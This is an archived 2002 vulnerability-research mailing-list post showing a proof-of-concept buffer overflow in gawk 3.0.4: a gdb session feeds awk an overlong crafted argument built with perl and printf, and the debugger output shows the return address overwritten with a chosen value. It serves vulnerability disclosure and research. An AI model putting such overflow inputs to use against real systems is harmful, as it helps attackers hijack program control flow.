Vulnerability Development mailing list archives
RE: Buffer overflow in awk
From: "dong-h0un U" <xploit () hackermail com>
Date: Sat, 16 Mar 2002 05:20:18 +0800
This puts last 'NULL byte' and change rule of program.
Pico editor or snmpd did exploit by similar method.

[x82@xpl017elz x82]$ gdb -q awk
(no debugging symbols found)...(gdb) r -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x82\x82"`
Starting program: /bin/awk -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x82\x82"`

Program received signal SIGSEGV, Segmentation fault.
0x8282bab0 in ?? ()
(gdb) q
The program is running. Exit anyway? (y or n) y
[x82@xpl017elz x82]$ rpm -qa | grep awk
gawk-3.0.4-1
[x82@xpl017elz x82]$

debugging:

(gdb)
...
0xbfffd2b0: 0x82828282 0x82828282 0x82828282 0x82828282
0xbfffd2c0: 0x82828282 0x82828282 0x82828282 0x82828282
0xbfffd2d0: 0x82828282 0x82828282 0x82828282 0x82828282
0xbfffd2e0: 0x82828282 0x82828282 0x82828282 0x82828282
0xbfffd2f0: 0x82828282 0x82828282 0x82828282 0x82828282
0xbfffd300: 0x82828282 0x8282bab0 0xbfffd300 0x080538cc
                       ~~ <- it's
0xbfffd310: 0xbfffdd46 0xbfffd390 0x080577e6 0xbfffdd46
0xbfffd320: 0xfffffffa 0x00000000 0x00000000 0x00000000
(gdb) x 0xbfffd304
0xbfffd304: 0x8282bab0
(gdb)

fun!
Sorry, I do not English. :-X

--
by "you dong-hun"(Xpl017Elz), <szoahc () hotmail com>.